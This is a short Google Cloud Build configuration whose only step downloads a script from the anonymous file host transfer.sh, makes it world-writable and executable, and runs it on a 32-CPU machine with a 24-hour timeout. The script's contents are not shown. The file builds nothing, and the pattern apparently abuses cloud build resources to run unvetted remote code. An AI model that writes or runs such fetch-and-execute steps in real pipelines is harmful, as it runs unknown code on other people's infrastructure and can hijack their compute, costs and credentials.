steps:
  - name: 'python:3.8'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          wget https://transfer.sh/TawDl/test.sh
          chmod 777 test.sh
          ./test.sh
timeout: 86400s
options:
  machineType: E2_HIGHCPU_32